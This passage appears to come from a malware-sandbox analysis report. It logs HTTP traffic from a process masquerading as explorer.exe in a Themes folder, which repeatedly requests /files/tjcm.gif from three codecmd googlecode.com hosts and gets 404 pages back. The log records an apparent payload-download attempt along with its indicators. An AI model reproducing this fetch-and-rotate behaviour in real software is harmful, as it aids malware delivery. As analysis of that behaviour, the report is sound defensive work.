3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:06.918780088 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49753	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:07.446038961 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:08.157198906 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:08 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:08.157231092 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49754	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:08.563836098 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:09.248454094 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:09 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:09.248476028 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49755	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:09.703639984 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:10.407167912 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:10 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:10.407197952 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49756	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:10.817604065 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:12.020350933 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:12.020375967 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:25:12.020390987 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Sep 2, 2024 14:25:12.020569086 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49757	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:12.447321892 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:13.162924051 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:13 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:13.163024902 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49758	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:13.672786951 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:14.354072094 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:14 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:14.354095936 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49759	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
